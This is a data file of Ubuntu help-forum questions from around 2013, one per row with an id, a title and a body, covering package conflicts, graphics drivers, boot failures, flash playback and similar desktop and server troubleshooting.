280659	how do i not resolve unmet dependencies ?	i followed the answer to how do i install gedit without zeitgeist ? and installed gedit without zeitgeist ( in fact , zeitgeist is completely removed ) . gedit runs happily without zeitgeist . now i ca n't install anything else , because synaptic complains all the time that two packages ( gedit and gedit-plugins ) are broken ; the update manager continually tries to upgrade zeitgeist from non-existent ; installing another package `` helpfully '' tries to uninstall gedit & plugins , etc . is there a way to tell apt to stfu and not install zeitgeist and not uninstall gedit ? no , apt-get -f install is precisely what i do not want .
280660	how do install glassfish on ubuntu server 12.x ?	does anyone know hwo to install glassfish on ubuntu server ? is there some kind of command line that does it seeing as ubuntu server has no ui so to speak ? for example , if i wish to install mysql i simply run this sudo apt-get install php5-mysql anything similar ie sudo apt-get install glassfish ? ? thanks
280665	converting a libreoffice impress slideshow so that it will run on my wife 's blog	my wife is an artist and she made a slideshow at my suggestion in impress . after spending a jillion hours learning how to make it work and the whole learning curve thing she was finally satisfied with the results . at my suggestion she exported it as an html and tried to post it on her eblog page . it did n't work . what she has googled says that she has to convert the slide show to a .swf that seems strange to me . any help would be greatly appreciated .
280667	will i be able to use wubi to install ubuntu releases newer than 12.10 ?	i want to install 13.04 ( or higher ) using wubi , is that possible ?
280673	ubuntu 12.10 installer does n't recognise windows 8 partition on toshiba c850 laptop	i purchased a toshiba c850 laptop and i 'm trying to install the 64 bit version of ubuntu 12.10 alongside windows 8 , allowing me to dual boot . i burnt a ubuntu 12.10 dvd , disabled secure boot on the laptop and then loaded the dvd . when i selected install ubuntu i see that the installer has n't recognised windows 8 on the drive and only gives me options to erase the entire disk or to do `` something else '' . i 've seen that it recognises other partitions but it does n't correctly find windows 8 . in this situation , how can i safely install ubuntu 12.10 alongside windows 8
280680	dual monitor ubuntu 12.04 - only one monitor works at a time	let me preface this by saying i 've been searching and hacking at this for a week . i 've tried everything that i 've ready ( that i understand ) on the site here and plenty of other sites . i 've been a linux/ubuntu user for many years but i do n't mess with xorg or video setup in linux very often so my experience in that area might be a bit lacking . that being said . problem : i have an hp compaq desktop with an onboard video card ( intel ) , an nvidia card , and an ati card . i can not get more than any one of them to work at a time however they all will work separately . i can change the default boot display in bios and change the one that is used but this does n't do me much good . goal : i have two monitors and i would like to run them both as an extended setup with two separate desktop spaces that i can use . i would like to run this in gnome . i 've tried : all of the different drivers i can find and think of . i do n't think this is the problem tho because i can see when i list the devices that they have drivers activated but not used . i 've attempted removing all drivers and only installing the xorg ones , also tried just using nouveau , just nvidia , just ati , etc ... combinations of these . the nvidia-settings tool says that no drivers are in use so that does n't do me any good . i 've tried dpkg-reconfigure -phigh xserver-org which just just puts me back on unity instead of gnome . i ca n't figure out why this happens . if i delete the xorg.conf and reboot i do get my gnome back . the regular display control panel only shows one display no matter what i 've done . the additional drivers panel currently has the _nvidia_96_ driver installed . when i try to install the unsupported nvidia driver it tells me that i have broken packages however i do n't believe i do . i 'm not sure what to try any longer and had started trying things randomly so i figured it might be time to reach out for a little help . below is some info that i generally see provided in video configuration help threads like mine . please let me know if i can provide any other info that might help determine what needs to be done here . thanks in advance ! helpful info : root @ flop : ~ # lshw -c video | grep product product : rv370 5b60 [ radeon x300 ( pcie ) ] product : rv370 [ radeon x300se ] product : nv18 [ geforce4 mx 4000 ] root @ flop : ~ # lspci | grep vga 07:04.0 vga compatible controller : nvidia corporation nv18 [ geforce4 mx 4000 ] ( rev c1 ) 20:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv370 5b60 [ radeon x300 ( pcie ) ] root @ flop : ~ # xrandr screen 0 : minimum 320 x 200 , current 1600 x 1200 , maximum 4096 x 4096 dvi-0 connected 1600x1200+0+0 ( normal left inverted right x axis y axis ) 367mm x 275mm 1600x1200 60.0*+ 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 s-video disconnected ( normal left inverted right x axis y axis ) 07:04.0 vga compatible controller [ 0300 ] : nvidia corporation nv18 [ geforce4 mx 4000 ] [ 10de:0185 ] ( rev c1 ) ( prog-if 00 [ vga controller ] ) subsystem : jaton corp device [ 1b13:0000 ] control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz+ udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 32 ( 1250ns min , 250ns max ) interrupt : pin a routed to irq 20 region 0 : memory at f8000000 ( 32-bit , non-prefetchable ) [ size=16m ] region 1 : memory at e8000000 ( 32-bit , prefetchable ) [ size=128m ] [ virtual ] expansion rom at f9040000 [ disabled ] [ size=128k ] capabilities : [ 60 ] power management version 2 flags : pmeclk- dsi- d1- d2- auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- kernel driver in use : nvidia kernel modules : nvidia_96 , nouveau , nvidiafb 20:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati rv370 5b60 [ radeon x300 ( pcie ) ] [ 1002:5b60 ] ( prog-if 00 [ vga controller ] ) subsystem : advanced micro devices [ amd ] nee ati device [ 1002:0f02 ] control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 48 region 0 : memory at f0000000 ( 32-bit , prefetchable ) [ size=64m ] region 1 : i/o ports at 1100 [ size=256 ] region 2 : memory at f9100000 ( 32-bit , non-prefetchable ) [ size=64k ] [ virtual ] expansion rom at f9120000 [ disabled ] [ size=128k ] capabilities : [ 50 ] power management version 2 flags : pmeclk- dsi- d1+ d2+ auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- capabilities : [ 58 ] express ( v1 ) endpoint , msi 00 devcap : maxpayload 128 bytes , phantfunc 0 , latency l0s < 128ns , l1 < 2us exttag+ attnbtn- attnind- pwrind- rbe- flreset- devctl : report errors : correctable- non-fatal- fatal+ unsupported- rlxdord+ exttag- phantfunc- auxpwr- nosnoop+ maxpayload 128 bytes , maxreadreq 128 bytes devsta : correrr- uncorrerr- fatalerr- unsuppreq- auxpwr- transpend- lnkcap : port # 0 , speed 2.5gt/s , width x16 , aspm l0s l1 , latency l0 < 128ns , l1 < 1us clockpm- surprise- llactrep- bwnot- lnkctl : aspm disabled ; rcb 64 bytes disabled- retrain- commclk+ extsynch- clockpm- autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x4 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt- capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit+ address : 00000000fee0100c data : 41b1 capabilities : [ 100 v1 ] advanced error reporting uesta : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uemsk : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uesvrt : dlp+ sdes- tlp- fcp+ cmpltto- cmpltabrt- unxcmplt- rxof+ malftlp+ ecrc- unsupreq- acsviol- cesta : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr- cemsk : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr- aercap : first error pointer : 00 , gencap- cgenen- chkcap- chken- kernel driver in use : radeon kernel modules : radeon , radeonfb 20:00.1 display controller [ 0380 ] : advanced micro devices [ amd ] nee ati rv370 [ radeon x300se ] [ 1002:5b70 ] subsystem : advanced micro devices [ amd ] nee ati device [ 1002:0f03 ] control : i/o- mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes region 0 : memory at f9110000 ( 32-bit , non-prefetchable ) [ disabled ] [ size=64k ] capabilities : [ 50 ] power management version 2 flags : pmeclk- dsi- d1+ d2+ auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- capabilities : [ 58 ] express ( v1 ) endpoint , msi 00 devcap : maxpayload 128 bytes , phantfunc 0 , latency l0s < 128ns , l1 < 2us exttag- attnbtn- attnind- pwrind- rbe- flreset- devctl : report errors : correctable- non-fatal- fatal+ unsupported- rlxdord- exttag- phantfunc- auxpwr- nosnoop- maxpayload 128 bytes , maxreadreq 128 bytes devsta : correrr- uncorrerr- fatalerr- unsuppreq- auxpwr- transpend- lnkcap : port # 0 , speed 2.5gt/s , width x16 , aspm l0s l1 , latency l0 < 128ns , l1 < 1us clockpm- surprise- llactrep- bwnot- lnkctl : aspm disabled ; rcb 64 bytes disabled- retrain- commclk- extsynch- clockpm- autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x4 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt-
280682	graphics card only show 256mb insted of 512mb	i have a hd5450 with 512mb . but lubunto only show that it has 256mb memory . how can i correct this ? lubuntu 12.04
280689	what is my login username and password ?	just loaded ubuntu server 12.04.2 and all went well . i rebooted the system and up came ubuntu login : i tried everything i could think of and pressed enter . 'password ' appears , but it wo n't let me type anything . what is my login ? i remember being asked to set a password , but not a login name .
280692	how do i reorder buttons in the window-list ( taskbar ) via drag and drop ?	i switched from gnome2 to xfce and miss the feature to re-arrange the window buttons in the taskbar ( window list ) . how can i make it working ? i use xubuntu 12.10 .
280696	can i configure a network interface ( eth0 , eth1 , etc . ) to be down by default , but still be available ?	can i configure a network interface ( eth0 , eth1 , etc . ) to be down by default , but still be available ? i would like my eth0 interface to be `` down '' after a fresh boot . with the option of using ifup eth0 from the command line to bring it up later .
280702	installing ubuntu server	i am currently in a networking class in high school . i 'm trying to install ubuntu server 12.10 on an actual server computer , but every time i try to boot into the hard drive , it just gives me a little `` _ '' on the top of the screen . i have to restart . i can go back into the cd-rom where ubuntu is on . i 've tried re installing about 4 times now , each time being unsuccessful . thanks for any help .
280705	update to latest version of opengl	i recently installed tf2 and cs : s on my ubuntu and it was showing nothing but a black screen ( i could still hear the sounds ) and after searching a bit i found out it may be my opengl version . after entering glxinfo|grep `` opengl version '' in the terminal it shows opengl version string : 2.1 mesa 9.0 the thing is i do n't know how to update it , i searched for additional drivers in software resources and none were listed ( which is n't normal in my opinion ) and after checking for drivers on my laptop 's website i could n't install anything because they do n't have linux support . my laptop is : acer aspire 5732z graphics card : intel gma 4500m
280706	can my settings be customized automatically when i boot on battery power ?	is it possible to tweak settings if and only if the computer starts on battery power ? why ? i usually work without battery , but when i use a battery i want it to last as long as possible . for that purpose i use little tweaks ( granola for minimal power consumption , switching off wifi and bluetooth , and brightness settings ) . what ? whenever i boot my laptop on battery i have to manually tweak all these settings . in the beginning that was ok , but now i want these tweaks to be done automatically . what i want to be tweaked automatically when booting on battery power is setting the laptop in flight mode ( no wifi nor bluetooth ) dimming the screen to 50 % disabling all usb inputs ( i often leave a few things in usb slots , but i do not want them activated ) set the power mode in granola to minimal consumption ( this needs sudo ) . any ideas ? a script that runs automatically when logging in on battery ? anything ?
280712	find defined shortcuts in xfce ?	i am using the phpstorm ide ( java software , run with oracle java 7 ) which defines the shortcuts ctrl+f12 and alt+f8 which are not working . other shortcuts do work , so i think there might be some kind of shortcut conflict wit xfce . actually nothing ( no xfce action ) is happening when pressing one of these combos . under settings - > keyboard - > application shortcuts none of this shorts is used . are there any other places which could cause shortcut problems ?
280716	flareget wont show any file on the list after reboot	i am using flare-get as download manager on my ubuntu 12.10 os . i am downloading a large file for a long time . due to some reason in the middle of download i had to restart my pc . i pause my running download and restart it and after that i could n't find any file on it 's list . i do n't know why . it happens all the time . is there any problem on settings ? or how could i resume that one .
280717	vmware player 5.0.2 slowness after ubuntu 12.10 upgrade	i 'm experiencing a frequent slowness/hanging on some virtual machines guests after upgrade to ubuntu 12.10 . i was using the same vms with ubuntu 12.04 / vmware player version with no slowness/hanging . ubuntu : release 12.10 ( quantal ) 32-bit / kernel linux 3.5.0-27-generic vmware player : 5.0.2 build-1031769 vm guests : windows 7 professional sp1 / windows 2008 server r2 sp1 is anyone experiencing similar issue ?
280718	wubi install works but clean install hangs	i did a wubi install of ubuntu 12.10 on my windows 8 pc . it installed flawlessly however it was running a little to slow so i decided to wipe win8 completely and try a clean install of ubuntu 12.10 x64 from a dvd . after selecting my language option at the installation menu i then select the option `` install ubuntu '' . the screen then goes black for a second , then i see the ubuntu logo in the center of the screen with a purple background . at this screen there are some progress `` bubbles '' below the logo which light up from left to right as it appears to be loading . then randomly the bubbles stop lighting up and the installation stops . i 've left it at this screen for several hours at a time and it does nothing , just frozen . i have tried setting the acpi , noacpi , and nomodeset options but none of them get me any further . i figured there may be a problem with the hd so i swapped it out with a brand new 500gb disk . same problem . i am running on a dell studio 1458 laptop with core i5 processor 8 gb of ram . i have also tried installing v12.04 lts and fedora 18 . all three get to the loading screen and then freeze . installing windows again works flawlessly . any ideas ?
280721	how can i revert to previous version of flash ?	the other day i applied updates and broke my ability to watch amazon videos on my computer . i am not alone . see the amazon forum post . how can i rever to the previous version of flash ? here 's what i 've tried so far . using tail -10 /var/log/dpkg.log i found this line that looks like the culprit on my system : 2013-04-10 16:31:56 status installed flashplugin-installer : amd64 11.2.202.280ubuntu0.12.10.1 at this point , i 'm not sure what to do . and i think the issue is complicated by the fact that the package i 'm referring to is an installer , not an actual plugin .
280723	i cant boot my installed ubuntu	i ca n't boot the installed ubuntu 12.0 on my toshiba satelitel750 . it only boot from the preinstalled os ( win7 ) and i want it to be alongside with different disk partition . there is no multiple option to boot for other oss .
280724	can not update , can not reinstall dkms	i was n't too surprised that i would need to reinstall the virtualbox-dkms business . but i ca n't do that this morning , as the result of my apt-get update is : i was n't too surprised that i would need to reinstall the virtualbox-dkms business . but i ca n't do that this morning , as the result of my apt-get update is : gn http : gpackages.medibuntu.org precise/free translation-en ign http : gpackages.medibuntu.org precise/non-free translation-en_us ign http : gpackages.medibuntu.org precise/non-free translation-en fetched 366 kb in 9s ( 38.4 kb/s ) reading package lists ... done w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : mirror : gmirrors.ubuntu.com precise release : the following signatures were invalid : nodata 1 nodata 2 w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : mirror : gmirrors.ubuntu.com precise-updates release : the following signatures were invalid : nodata 1 nodata 2 w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : mirror : gmirrors.ubuntu.com precise-backports release : the following signatures were invalid : nodata 1 nodata 2 w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : mirror : gmirrors.ubuntu.com precise-security release : the following signatures were invalid : nodata 1 nodata 2 w : failed to fetch mirror : gmirrors.ubuntu.com/mirrors.txt/dists/precise/release w : failed to fetch mirror : gmirrors.ubuntu.com/mirrors.txt/dists/precise-updates/release w : failed to fetch mirror : gmirrors.ubuntu.com/mirrors.txt/dists/precise-backports/release w : failed to fetch mirror : gmirrors.ubuntu.com/mirrors.txt/dists/precise-security/release w : some index files failed to download . they have been ignored , or old ones used instead .
280728	change permissions on all folders and files	i have ubuntu 12.04 . i want to change permissions on all folders and files at the same time so that anyone can modify or remove them .
280731	ubuntu 12.10 flickering with amd radeon hd 6625m	i let my the software update update the kernel . but when it restarted , it started to flicker and flash the screen . i can only hear the login screen sound . i can restore this by selecting the old kernel from grub . how do i fix it ? or at least someone tell me how to make it boot from the old kernel automatically .
280732	strange messages when suspending/hibernating	while suspending or hibernating , a terminal is shown . normally it 's blank , but lately it 's been showing messages like these : [ 429.276100 ] i2400m_usb 2-1.5:1.0 : device reset on resume : reinitializing driver [ 33773.933883 ] i2400m_usb 2-1.5:1.0 : failed to suspend , will reset on resume [ xxxx24.329201 ] i2400m_usb 2-1.5:1.0 : device rebooted : reinitializing driver ( i took a picture of it , since they do n't stay up long , & could n't read some of those last numbers because of a glare on the screen . ) a new line is added each time the computer wakes up , and the numbers in brackets grow larger each time . what does it mean ? update : since i upgraded to 13.04 , there 's been a new message : [ numbers ] iwlwifi 0000:09:00.0 : failed to alloc_pages with gfp_kernel.only 0 free buffers remaining . this is on 12.10 13.04 64-bit .
280733	readpst works nonsatisfying	is somebody able to help me ? i use ms-outlook 2010 under windows 7 and i would like to use contacts and appointments saved in outlook in evolution 3.2.2. too . therefore i installed âreadpstâ from the ubuntu software-center and i used it equal to the todo on the ubuntu-homepage : import pst in evolution 3.2.1 at first sight contacts and appointments are transfered acceptably . but on closer inspection it appears that my contacts which have birthday before 1st of january 1970 their birthdays are fixed on 01.01.1970 . because the most of my contacts are older than 43 years hardly any birthday is false . that is not acceptable for me . is there any other way to import pst-data into evolution ? many thanks for your assistance . best regards dietmar
280734	screen brightness not working ( sony t series )	i have a sony t-series notebook with an intel hd 4000 graphics card . i use ubuntu 12.04 . the brightness control of the screen does not work ( does n't matter if i do it with the keyboard or in the system settings ) . i see the bar that is changing but nothing happens .
280735	persona issues in libreoffice 4.0.2.2	just wondering are there any issues with the personas in lo 4.0.2.2 ? ? i installed lo 4.0.2.2 as follows : sudo apt-get purge libreoffice* sudo add-apt-repository ppa : libreoffice/libreoffice-4-0 sudo apt-get update sudo apt-get install libreoffice it seems to install smoothly , but when i try to add a persona , by pasting a link into the field beside own persona and click ok nothing happens . any help here would be greatly appreciated . thanks . pc
280736	running out of space on hard drive , want to upgrade to ssd	i 'm currently receiving the low disk space message on ubuntu 10.04 and would like to upgrade to an ssd for speed and size . what is the best way to save my current information and change the disk and possibly the os ?
280737	questions about architecture	so , i 've been trying to learn as much as i can about linux operating systems , and something is currently confusing me . uname -a linux l655 3.5.0-27-generic # 46-ubuntu smp mon mar 25 19:58:17 utc 2013 x86_64 x86_64 x86_64 gnu/linux okay , so my system is x86_64 , which means it is 32bit , correct ? so , since it is 32 bit i can only install 32 bit programs . my confusion is over the fact when i was installing the google talk plugin , the i386 .deb did n't work and the amd64 did . why ? also , if i install a program with dkpg , will my other package managers ( synaptic , software center , ect ) know about it ? thanks .
280741	which ubuntu for hp tc1100	i have an old hp/compaq tc1100 tablet that i would like to install ubuntu on . where shouold i start ?
280747	trash of local filesystem problems with nfs home	using ubuntu 12.04 . at the university we have an nis , and home directories are centralized on an nfs share . when i delete something from my home directory , all is well . however , because the share is both fairly slow and space is limited , i have appropriated a local directory on my computer . however , when trying to delete something it can not use the trash . at first i thought this was simply a problem of permissions , so i created the .trash-xxxxx ( where xxxxx is my uid ) directory at / and chowned it to myself . now the trash correctly gets moved there , but it does not show up in the trash applet on the desktop . was my solve for the initial problem the correct approach , and if so , how do i solve the second issue ? if not , how should i solve the initial problem ?
280753	how to know which package makes 'tntnet ' service autostart ?	tntnet uses port 80 , which makes apache not started . how to know which package makes 'tntnet ' service autostart ? can i cancel it from autostart ?
280764	bumblebee with nvidia-exxperimental-310 primus : failed to load any of the libraries	i have a dell inspirion 5720 with intel hd 4000 with nvidia gt 630m , running ubuntu 12.10 64bit . i installed bumblebee first , and worked , after that primus , and it worked again . after that i installed nvidia-experimental-310 ( 310.14 ) and changed both bumblebee.conf and the run file in /usr/bin/primusrun . optirun runs fine and gained a 10 fps boost but primusrun gives this error : $ primusrun glxspheres primus : fatal : failed to load any of the libraries : /usr/lib/nvidia-experimental-310/libgl.so.1 : /usr/lib32/nvidia-experimental-310/libgl.so.1 libnvidia-tls.so.310.14 : can not open shared object file : no such file or directory /usr/lib32/nvidia-experimental-310/libgl.so.1 : wrong elf class : elfclass32 i dont know why . and i followed this : http : //www.webupd8.org/2012/12/use-nvidia-experimental-drivers-310.html here are my conf files : bumblebee.conf : http : //pastebin.com/tl0fvern /usr/bin/primusrun : http : //pastebin.com/tp4pjpqs
280767	disable laptop touchpad	i 'm using a lenovo x230 laptop which features a touchpad and a trackpoint . i love the trackpoint and dislike the touchpad -- i continuously hit it with my thumb . i would like to disable the touchpad , but leave everything else working . i 've tried using xinput by putting the following in my .xinitrc : $ xinput -- disable 'synps/2 synaptics touchpad' this works , however , after a few minutes , the touchpad becomes enabled again . i 'm not sure why this is happening . is this the best way to persistently disable the touchpad ?
280768	how to rename a file in terminal ?	i have : /home/user/my_static /home/user/static/ how do i rename my_static to static and remove static ( 2 ) ?
280772	internet wont connect despite working wireless/ethernet	i have 12.10 installed on a partitioned drive along with windows 7 on a new gateway pc . ubuntu will not connect to the internet , while windows will . i have spent many many hours reading forums trying to fix this problem , but can not figure it out . my wireless card is made by realtek . its driver , rtl8192ce , appears to be working . i can scan for and pick up wireless networks . it says i am connected . i can ping 8.8.8.8 successfully . however : i can not ping www.google.com or use a browser , install updates or anything of the kind . if i plug in an ethernet cable , or turn the wireless on and off it will sometimes get a connection for a few moments . i have tried blacklisting possible competing drivers , but as best as i can tell , only one is running . overall i am an linux novice , everything i know about it comes from trying to solve this problem . any help would be very very appreciated .
280774	overheating in ubuntu but not in windows	my sensors show 70째c coretemp . ( sometimes up to 80째c ) lm-sensors sudo sensors-detect yesyes ... : client found at address 0x50 probing for `analog devices adm1033 ' ... no probing for `analog devices adm1034 ' ... no probing for `spd eeprom ' ... no probing for `edid eeprom ' ... yes ( confidence 8 , not a hardware monitoring chip ) fancontrol- > sudo pwmconfig : /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed i cleaned the fan and renewed the thermalpaste ( it was darkish and hard , looked pretty grilled ) reducing cpu to 800mhz with jupiter power works , but its not nice , since i use blender for modeling . the fan makes noise , but there is almost no air coming out ( but the air is very hot ) what can i do to protect my acer aspire laptop from grilling ? since on windows7 there was never a overheating problem , i suppose its something with ubuntu , right ? thank you for help
280775	apt-get update throws 404 errors	when trying to run apt-get update some some `` 404 not found '' errors are showing up . the first of them is : w : failed to fetch http : //ppa.launchpad.net/freyja-dev/unity-tweak-tool-daily/ubuntu/dists/precise/main/source/sources 404 not found how do i fix this ?
280778	ca n't boot ubuntu , not even in safe mode	at first i could n't even access the grub menu . booted from live cd and repaired that with the grub repair tool . now when i try to boot normal , i get the purple screen thing . i tried the nomodeset thing and its not working anymore . a few days ago i had the same problem and it worked when i put nomodeset instead of quiet splash.. if i try to boot in recovery mode , i get a dialog , and any option i choose from the menu ( resume , dpkg , or the option without graphics support ) i get another dialog saying : continuing will remount your / filesystem in read/write mode and mount any other filesystem defined in /etc/fstab if i click ok , i get mountall : mount /home/ ... ../desktop/access [ 1219 ] terminated with status 32 and that 's it . the mount worked ok until now , everything was ok , apart from the nomodeset thing after i made some ubuntu updates ... last thing i did this morning i edited something to the grub file , so i do n't need to always edit nomodeset ... but even after that the system started.. i have ubuntu 12.04 installed on a asus u36s notebook . no nvidia drivers installed . the notebook has the optimus graphics thing , but i did n't install bumblebee . do n't really need the nvidia graphics ... update : i managed to boot from a live cd and mounted the hardrive and edited /etc/default/grub back to initial and also edited /etc/fstab back to initial state . after this i still cant boot ubuntu in normal mode , with/without nomodeset in grub menu . and when i boot in recovery mode , i get the console , i log with my account and after 1-2 mins i just get a black screen and nothing happening .
280779	gnome broken splash screen	i installed ubuntu 13.04 today with gnome ( first ubuntu 13.04 , then apt-get install gnome-shell ) . after this my boot screen is broken , you can see this here : this happened at ubuntu 12.04 and ubuntu 12.10 after installing gnome-shell ( for gnome 3 desktop environment ) , too , at shutdown and start . how can i fix this ? additional information about graphic card and driver : name : geforce gtx 560 ti driver : 310.44
280780	installing ubuntu from a tablet , what do i do ?	ladies and lordships ! i 'm getting a new pc tonight , which i 'm very happy about , but , it doesnt have an operating system . so , where else to go , but into ubuntuland ? ubuntuland , right ? : ) but , and this is my problem , i 'll need to install the software from my android galaxy tab 2 . how.. do i do that ? where do i pick up the iso file , so my new machine can find it ? i 'm guessing this might be fruitful to post in the samsung forums also , but if any1 has an idea , please fill me in . kind regards simon
280783	usb flash drive automounting	i 'm trying to prevent my usb flashdrive from getting automounted upon insertion . i 've already set automount to false under org.gnome.desktop.media-handling , yet the flash drive continues to get mounted automatically . i 'm on ubuntu 12.10 .
280786	increase the disk spindown timeout	when my laptop ( running ubuntu 12.04 ) is on battery , the disk powers off after a few seconds of inactivity — about 20s . i use lightdm to log in , and have some gnome components running ( i have gnome-panel and a number of dependencies ) , but i use neither gnome nor unity as a desktop environment ( i start the sawfish window manager manually ) . 20 seconds is ridiculously fast : in practice the disk keeps powering down and back up immediately , which is slow ( bad user experience ) , potentially damaging the drive ( though i 've never been able to find concrete data abouth this ) , and actually consumes more energy when the spun-down time is very short ( a 2008 analysis found that for a particular disk , standby mode saved energy if it lasted for more than 9s ; mine often last less ) . therefore i want to increase this timeout . how can i do this ? i do n't know what software is causing the spindown . looking at the running processes , i only see upowerd which might be related to power management . killing it makes no difference . the timeout probably comes from the disk itself : hdparm -i /dev/sda reports “advanced power management level : 1” ( which does n't match the 20 seconds , as it should mean 5 seconds according to the hdparm documentation… ) . i have seen that same machine with the value 254 at other times . what is causing the value to change while on battery power ? i ca n't see any call to hdparm in /etc/acpi/* .
280790	fix flash via command line	like many others ( how do i fix flash issues ? ) i am having flash issues with firefox ubuntu 12.04 64bit firefox 20.0 and for the life of me i can not get flash to play . i have tried : sudo apt-get install flashplugin-nonfree and sudo apt-get install adobe-flashplugin and when i , lets say watch a video on youtube , its just a black frame where the video should be . i am running it headless via xfvb , so i am unable to use flashaid . i want the solution to be scriptable so i can autoconfigure the box via chef or the like . any help would be much appreciated thanks ! ! similar posts : what 's the difference between flashplugin-installer and adobe-flashplugin ? flash not working in firefox how do i fix flash issues ?
280798	bash - how to execute a terminal command without opening the terminal gui	i am trying to execute a terminal command in bash , but i do n't want the terminal gui to open . here is my code : # ! /bin/bash gnome-terminal -e `` java abc '' any suggestions ? thanks !
280803	configuration files in a kde application	i 'm writing an open source application using kde to sell in the software center . according to the requirements for uploading an application to the software center , write all configuration settings to ~/.config/ ( this can be one file or a directory containing multiple configuration files ) by default , it appears that kde applications store configuration files in ~/.kde/share/config/ < name > rc . is this not allowed ? if so , how do i change where the file is stored ? i 'm using kconfig xt . the tutorial says start that file by opening the tag which controls which kconfig file the data will be stored in . there are three possibilities : if the < kcfgfile > tag has no attributes the generated code will use the application 's default kconfig file ( normally $ home/.kde/config/ < appname > rc ) . the `` name '' attribute is used to manually specify a file name . if the value assigned to `` name '' is not an absolute file path , the file will be created in the default kde config directory ( normally $ home/.kde/config ) . if you would like to be able to specify the config file at construction time , use < kcfgfile arg= '' true '' > . this causes the constructor of the generated class to take a ksharedconfig : :ptr as an argument , allowing you to construct multiple instances pointing to different files . i 've tried setting the name attribute to be ~/.config/ < appname > , but there is no file at that location , although settings are still being saved . also , when i set the name attribute , other settings are still saved to ~/.kde/share/config/ < appname > rc , such as window size . how to i change where configuration data is stored for a kde app so it will meet upload requirements for the software center ?
280811	maas pxe boot fail . ip-config : no response	i have installed ubuntu 12.10 server , with maas option . all the processes during and after installation end successfully . maas-import-pxe-files works and imports the precise images . but when i boot up a node using pxe , it gives me : ip-config : eth0 hardware address 89:00:29:79:86 : e1 mtu 1500 dhcp [ 2.775718 ] eth0 : link up ip-config : no response after 60 secs - giving up this is after the linux and initrd.gz have loaded , and the devices have been recognized . i have tried booting with other machines , same issue . dhcp is working fine .
280815	prevent option popup when launching a bash application	when i double click on my bash ( .sh ) application ubuntu asks me if i would like to reun the application in the terminal , just run the app or display its contents . how cani prevent this popup from popping up ? any suggestions ? thanks !
280816	gvim always starts in the home directory !	i use gvim to edit my tex files and it is the default editor . so i just double click on the tex files to edit them and that opens them with gvim . however , the working directory for gvim is always the home directory which is odd since i would expect the working directory to be the one in which the file that i have just double-clicked and opened is present . this causes a lot of inconvenience since i normally want to run commands in that directory in gvim and i have to manually change it every time . any suggestions on how i can have gvim starting in the proper way ? thanks a lot in adcvance . i have already checked the .gvimrc file and i see nothing suspicious . it just has my font and color settings , that 's all .
280818	how do i remove the .ecryptfs folder that was created after deja-dup backup ?	i have a very large .ecryptfs folder in my /home directory that is the size of my /username directory . i believe it was created after i ran a backup using gksu deja-dup-preferences . previous threads all talk about encrypting the home during setup , but i 'm pretty sure that i did n't opt for that when installing ubuntu . also , previous solutions included backing up data from the /private folder before continuing to the other steps , and i do n't have a /private folder , so i do n't feel comfortable continuing . furthermore , previous threads claim that the space used is virtual , but it 's not ; definitely 2 folders in my /home that each take up the same space and my space is limited so it 's disabling my installation of software , etc . any help would be greatly appreciated . i 'm running ubuntu 12.04 with gnome shell on an 8g partition .
280820	how to get old options back in nautilus 's `` connect to server '' window ?	i just installed ubuntu 12.10 with gnome 3.6 classic . when i try to use places - > connect to server , i get a window missing all the options i was used to in ubuntu 11.10 ( such as ssh ) . i can only insert the ip address of the remote machine . it is the same as if i use a normal nautilus browser window and enter the address there . where can i configure the system to have full options ?
280822	gtk+ within python 2 and 3	can gtk+ with python create app on ubuntu os ?
